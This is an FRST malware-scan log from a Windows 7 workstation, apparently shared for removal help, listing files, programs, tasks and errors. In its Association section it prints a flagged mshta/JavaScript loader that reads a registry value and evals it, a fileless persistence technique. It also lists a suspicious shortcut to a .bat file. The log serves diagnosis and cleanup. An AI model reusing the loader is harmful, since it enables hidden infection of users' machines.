2016-11-09 15:50 - 2016-10-27 12:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-11-09 15:50 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-11-09 15:50 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-11-09 15:50 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-09 15:50 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-11-09 15:50 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-11-09 15:50 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-11-09 15:50 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-11-09 15:50 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-11-09 15:50 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-11-09 15:50 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-11-09 15:50 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-11-09 15:50 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-11-09 15:50 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-11-09 15:50 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-11-09 15:50 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-11-09 15:50 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-11-09 15:50 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-11-09 15:50 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-11-09 15:50 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-11-09 15:50 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-11-09 15:50 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-11-09 15:50 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-11-09 15:50 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-11-09 15:50 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-11-09 15:50 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-11-09 15:50 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-11-09 15:50 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-11-09 15:50 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-11-09 15:50 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-11-09 15:50 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-11-09 15:50 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-11-09 15:50 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-11-09 15:50 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-11-09 15:50 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-11-09 15:50 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-11-09 15:50 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-11-09 15:50 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-11-09 15:50 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2016-11-09 15:50 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-11-09 15:50 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2016-11-09 15:50 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2016-11-09 15:50 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME
2016-11-09 15:50 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)


==================== Files in the root of some directories =======

2016-11-02 10:51 - 2016-11-15 10:31 - 0882323 _____ () C:\Users\cjerald\AppData\Local\ars.cache
2016-11-02 10:51 - 2016-11-15 13:02 - 18068701 _____ () C:\Users\cjerald\AppData\Local\census.cache
2016-11-02 10:38 - 2016-11-02 10:38 - 0000036 _____ () C:\Users\cjerald\AppData\Local\housecall.guid.cache
2016-11-02 10:50 - 2016-11-15 02:28 - 0000010 _____ () C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache
2014-03-12 18:30 - 2014-03-12 18:30 - 0000095 _____ () C:\ProgramData\SAH_Install.ini

Some files in TEMP:
====================
C:\Users\cjerald\AppData\Local\Temp\libeay32.dll
C:\Users\cjerald\AppData\Local\Temp\msvcr120.dll
C:\Users\cjerald\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-11-16 06:13

==================== End of FRST.txt ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 19-11-2016 01
Ran by CJerald (19-11-2016 16:33:05)
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Windows 7 Professional Service Pack 1 (X64) (2013-12-12 14:41:32)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-343821754-1919214937-3281495952-500 - Administrator - Disabled)
Guest (S-1-5-21-343821754-1919214937-3281495952-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.8 - Adobe Systems)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Backblaze (HKLM-x32\...\Backblaze) (Version:  - Backblaze, Inc)
Canon MF Toolbox 4.9.1.1.mf09 (HKLM-x32\...\{6767DFEE-8909-453A-B553-C7693912B2EB}) (Version: 3.2.0 - Canon)
Canon MF8300 Series (HKLM\...\{E47364AA-6B5E-45a2-B94F-BC5D9D6A0338}) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix)
CYMA IV Accounting Workstation (HKLM-x32\...\{6F43D45B-4C72-4BB8-9601-BFE282765A38}) (Version: 14.3.0 - CYMA Systems Inc.)
CYMA IV Accounting Workstation (x32 Version: 13.0.0 - CYMA Systems Inc.) Hidden
CYMA IV Accounting Workstation (x32 Version: 14.0.0 - CYMA Systems Inc.) Hidden
DiskCheckup v3.4 (HKLM-x32\...\DiskCheckup_is1) (Version: 3.4.1002 - PassMark Software)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 12.0.6.0 - FlashPeak Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.0.0.1019 - Citrix Online, a division of Citrix Systems, Inc.)
GoToAssist Customer 2.7.0.1092 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.7.0.1092 - Citrix Online)
GoToMeeting 7.26.0.5808 (HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\GoToMeeting) (Version: 7.26.0.5808 - CitrixOnline)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.0.157.1 - Intel Security)
Intel® Network Connections 21.1.30.0 (HKLM\...\PROSetDX) (Version: 21.1.30.0 - Intel)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
marvell 91xx driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1047 - Marvell)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyDefrag v4.3.1 (HKLM\...\MyDefrag v4.3.1_is1) (Version: 4.0.0.0 - J.C. Kessels)
NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.2.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.2.2 - NVIDIA Corporation)
NVIDIA Graphics Driver 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6257 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.26.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.26.0 - Renesas Electronics Corporation) Hidden
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version:  - Roadkil.Net)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.0.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 17.12.8 - NVIDIA Corporation) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.5800 - Broadcom Corporation)
Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5636\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {00CE36DB-6A59-4EDB-9CE8-3D9F4F58544F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-09-26] (Adobe Systems Incorporated)
Task: {67103020-3F8F-4EDA-8E62-70B7D54ACB04} - System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe [2016-11-02] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {748E8811-5D55-4A95-920A-A2AB97876CA2} - System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148 => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe [2016-11-02] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {791D2EF3-CC5F-456B-BA1D-73D0FF09CA20} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7C218579-20A7-4E64-865C-4259D7EE197E} - System32\Tasks\{F111F422-023F-4E16-B5C9-51B124B93F42} => C:\Program Files (x86)\Canon\MF Toolbox Ver4.9\MFTBOX.exe [2009-06-22] (CANON INC.)
Task: {7F116B38-B214-4CB7-8D57-75B6AD0DA29B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {90796BBB-1718-4BBD-90E0-BD8974C45185} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-01] (McAfee, Inc.)
Task: {CAA82495-2800-4590-9E6F-20FBD34E3713} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-11-02] (AVAST Software)
Task: {CAD262DC-4394-4840-AF0D-12204F01BD2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupdate.exe
Task: C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job => C:\Users\cjerald\AppData\Local\Citrix\GoToMeeting\5808\g2mupload.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat ()

==================== Loaded Modules (Whitelisted) ==============

2015-11-25 14:00 - 2016-11-16 22:12 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe
2013-12-12 13:16 - 2015-08-17 19:07 - 00115376 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Classes\d122cd: "C:\Windows\system32\mshta.exe" "javascript:iPH9j5="V15iBXVx";s12d=new ActiveXObject("WScript.Shell");M40aWd="cEsTuKN";TtXA7=s12d.RegRead("HKCU\\software\\auux\\onnlw");FU76Gv="LccebV4j";eval(TtXA7);Br6Aj="O1GiJK";" <===== ATTENTION

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-11-01 12:29 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Control Panel\Desktop\\Wallpaper -> C:\Users\cjerald\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.105 - 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: Intel® PROSet Monitoring Service => 2
MSCONFIG\Services: LMIGuardianSvc => 2
MSCONFIG\Services: LMIMaint => 2
MSCONFIG\Services: LogMeIn => 2
MSCONFIG\Services: UNS => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: LogMeIn GUI => "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe"
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{A79DD511-2162-4E17-84DC-E427C7089D6F}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{927A5DA9-3912-4C00-993F-5E7E7D2E378C}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{C91EBF51-63D3-487A-A5C4-4AA7ECAA3F63}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{12BE54D9-D811-4084-B305-9C0CDDE91A9E}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{0221E735-4049-4942-B8A0-C1023385A22A}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{EFC291DC-7AA8-46EF-9D8C-86542FBA9448}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{FA416475-07C3-4377-AD2B-158E3ECF4CC9}] => (Allow) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe

==================== Restore Points =========================

18-11-2016 15:31:55 Malwarebytes Anti-Rootkit Restore Point

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/18/2016 07:41:25 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 07:17:59 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 06:06:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 03:41:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (11/18/2016 12:16:01 PM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 08:41:59 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 07:07:59 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 05:19:00 AM) (Source: Microsoft-Windows-Folder Redirection) (EventID: 511) (User: IDS)
Description: Failed to process policy info.
 Error details: "The specified network name is no longer available.
".

Error: (11/18/2016 03:58:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CompatTelRunner.exe, version: 10.0.14913.1002, time stamp: 0x57d1070d
Faulting module name: devinv.dll, version: 10.0.14913.1002, time stamp: 0x57d10950
Exception code: 0xc0000005
Fault offset: 0x0000000000023c00
Faulting process id: 0x71a4
Faulting application start time: 0x01d2417610386c0f
Faulting application path: C:\Windows\system32\CompatTelRunner.exe
Faulting module path: C:\Windows\system32\devinv.dll
